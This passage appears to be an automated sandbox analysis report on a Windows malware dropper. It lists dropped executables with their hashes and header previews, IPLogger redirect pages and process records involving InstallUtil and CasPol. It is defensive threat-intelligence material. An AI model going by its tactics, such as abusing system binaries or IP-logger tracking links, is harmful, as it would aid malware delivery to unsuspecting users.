                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:gnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHR:jWqlkLESgCRE/vhOjb05efd6e/oXHR
                                                                                                                          MD5:C8351920152B31401CE434C51D041E90
                                                                                                                          SHA1:92267B5A7D98CA7821826E996996A2A12F81C014
                                                                                                                          SHA-256:9FF2D365D15E7C784BA32973A54A639441B7A4E19654B15EA84464B59AC8EE3C
                                                                                                                          SHA-512:D97EAD782AE0FFD33D2FDC4D9DCDD94C40EB9C0DF960F51ABAC210878BF82A3C95FE06A0CFC20B1B1EBF9597235494578B0C5E83BF3BBD79565D4135A65A186D
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......~-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                          C:\Users\user\Pictures\uYudt0flCl0e0fQZ8vnWLOhm.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956920
                                                                                                                          Entropy (8bit):7.99369020397791
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

                                                                                                                          C:\Users\user\Pictures\uhBVT5V3lDslDlt8tqNtlrAY.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                          C:\Users\user\Pictures\vM1uCPFSWXKxJxL2erpSUwze.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                          C:\Users\user\Pictures\vuP05YoHCo3Zp0Gv9gzt1k3R.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\Pictures\vzEeLze12RaA0DTINh80KVLb.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                          C:\Users\user\Pictures\wT1m3cYdySIZCFNyNz1LtiDI.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                          C:\Users\user\Pictures\wpKptbv32NVp981jR7IpS2TU.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                          C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.7684781715563425
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:WnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXH+:FWqlkLESgCRE/vhOjb05efd6e/oXH+
                                                                                                                          MD5:BCC38593B03EE04D072E36C9513BCF54
                                                                                                                          SHA1:23C84983EAB71EFBC7615B0E60A67D0D1C3A62D4
                                                                                                                          SHA-256:6B6A921F87E6FCC245DE2BADD36F3276B8A6662BBA129EDE2BE971FCF472FB8C
                                                                                                                          SHA-512:F6C75DDFB5B82466BC8271B4D6BA2B2AAC093F7F67C92C4AB0370C2FF15793BBC62170FC891836BB2B30EAC431F2302CC8B75AA6BA77E974F2F85FCC5A693241
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....8v-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                          C:\Users\user\Pictures\zPfLCPjAc0Qdx1kXORAqoZYr.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

                                                                                                                          C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):55
                                                                                                                          Entropy (8bit):4.306461250274409
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1835008
                                                                                                                          Entropy (8bit):4.421686715843269
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:RSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:ovloTMW+EZMM6DFy403w
                                                                                                                          MD5:129C8997F4DF0A815BAB1D6AA459C4AD
                                                                                                                          SHA1:5603041D4ABCCF6A273869C60616E5274289906D
                                                                                                                          SHA-256:06799E4AA44534A144398A9FEB045D1408414D82B069B3DDDDDAE2EDB2E4EAF6
                                                                                                                          SHA-512:926AF488AEAE039FEBF232E96123E470BF95E0F03CC602FB27441B9CFEA2DAF6D6F232815F4155B6C82FDC441CA4B73E7B6FEEA911721EDF50DBD4B3A8E8E00C
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf>...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm._~4Rt................................................................................................................................................................................................................................................................................................................................................h.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Windows\appcompat\Programs\Amcache.hve.LOG1

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                          File Type:MS Windows registry file, NT/2000 or above
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1744896
                                                                                                                          Entropy (8bit):4.574651723001575
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6144:7Svfpi6ceLP/9skLmb0OTMWSPDaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:mvloTMWSEZMM6DFy403w
                                                                                                                          MD5:4B07F2941DDF768D81082271849A47FD
                                                                                                                          SHA1:BBF1AC4DCFB2BACFAAD1B53D7BF5528EFDCEA923
                                                                                                                          SHA-256:12DDA2DCA7F548077C64A14F8B4CE9DB0B6C2EFF777F6D8A2FDFCA0F766FA392
                                                                                                                          SHA-512:1ECAD78C6E3DA4557E60B13CCF6EC3BEB5EB6BAB287238290763E85B9E48C47D105D78723A68AE3F3D2EAA15F5B2E0CCA824608F3AA787B2359942179B2E20AB
                                                                                                                          Malicious:false
                                                                                                                          Preview:regf=...=....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm._~4Rt................................................................................................................................................................................................................................................................................................................................................h.HvLE........=.............!..g...9C.1*......0...@...`..hbin.................\.Z............nk,..\.Z........ ..........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........U...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............

                                                                                                                          Static File Info

                                                                                                                          General

                                                                                                                          File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                          Entropy (8bit):5.827404709879398
                                                                                                                          TrID:
                                                                                                                          • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                                                          • Win64 Executable GUI (202006/5) 46.43%
                                                                                                                          • Win64 Executable (generic) (12005/4) 2.76%
                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                                                          • DOS Executable Generic (2002/1) 0.46%
                                                                                                                          File name:file.exe
                                                                                                                          File size:40'448 bytes
                                                                                                                          MD5:699e79d0f4a7586ffe53d0dabc5c0a5a
                                                                                                                          SHA1:7178ab85fe6190259b64846c76af01b8da5b0cd4
                                                                                                                          SHA256:b930e1b461a4c64396b0c52f17d7c504a5e8dc24114ff186eb129e8a548143ca
                                                                                                                          SHA512:56bab1c5eaf18bef213da76f8c5ccdc15ce6fd59d93cfff77604378a1f474f2045d975ebd14563f712c9054f0a6b8e35c42f311322bca192d1f68bf5684aa526
                                                                                                                          SSDEEP:768:sRyIN4srhwS4CGlB7+zM2WiWYiP8gzBggIfiN5SNUJ:2yIN42h6n2rWiKPPzBm9Ns
                                                                                                                          TLSH:57036D21B3AC873BCEEE07B9AC61614013749362B982CF9D5CD865AF44AB7C503163A7
                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...I.B..........."...0.....&............ ....@...... ....................................`................................

                                                                                                                          File Icon

                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                          Static PE Info

                                                                                                                          General

                                                                                                                          Entrypoint:0x400000
                                                                                                                          Entrypoint Section:
                                                                                                                          Digitally signed:false
                                                                                                                          Imagebase:0x400000
                                                                                                                          Subsystem:windows gui
                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                          Time Stamp:0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                                                                                                                          TLS Callbacks:
                                                                                                                          CLR (.Net) Version:
                                                                                                                          OS Version Major:4
                                                                                                                          OS Version Minor:0
                                                                                                                          File Version Major:4
                                                                                                                          File Version Minor:0
                                                                                                                          Subsystem Version Major:4
                                                                                                                          Subsystem Version Minor:0
                                                                                                                          Import Hash:

                                                                                                                          Entrypoint Preview

                                                                                                                          Instruction
                                                                                                                          dec ebp
                                                                                                                          pop edx
                                                                                                                          nop
                                                                                                                          add byte ptr [ebx], al
                                                                                                                          add byte ptr [eax], al
                                                                                                                          add byte ptr [eax+eax], al
                                                                                                                          add byte ptr [eax], al

                                                                                                                          Data Directories

                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x626.rsrc
                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0xb2340x38.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                          Sections

                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                          .text0x20000x930a0x9400a75771b70601ca0fe7c1a66e8cc9bde5False0.5053578969594594data5.9423712891807465IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                          .rsrc0xc0000x6260x8007ccd95491660fbda3924dbe08f84df33False0.32421875data3.4778778318304995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                          Resources

                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                          RT_VERSION0xc0a00x39cdata0.38852813852813856
                                                                                                                          RT_MANIFEST0xc43c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                                                          Network Behavior

                                                                                                                          Skipped network analysis since the amount of network traffic is too extensive. Please download the PCAP and check manually.

                                                                                                                          Statistics

                                                                                                                          CPU Usage

                                                                                                                          Click to jump to process

                                                                                                                          Memory Usage

                                                                                                                          Click to jump to process

                                                                                                                          High Level Behavior Distribution

                                                                                                                          Click to dive into process behavior distribution

                                                                                                                          Behavior

                                                                                                                          Click to jump to process

                                                                                                                          System Behavior

                                                                                                                          General

                                                                                                                          Target ID:0
                                                                                                                          Start time:08:52:03
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                          Imagebase:0x2c8b7e00000
                                                                                                                          File size:40'448 bytes
                                                                                                                          MD5 hash:699E79D0F4A7586FFE53D0DABC5C0A5A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:low
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:2
                                                                                                                          Start time:08:52:04
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\System32\svchost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                          Imagebase:0x7ff7e52b0000
                                                                                                                          File size:55'320 bytes
                                                                                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          General

                                                                                                                          Target ID:3
                                                                                                                          Start time:08:52:15
                                                                                                                          Start date:12/03/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          Wow64 process (32bit):
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                          Imagebase:
                                                                                                                          File size:108'664 bytes
                                                                                                                          MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
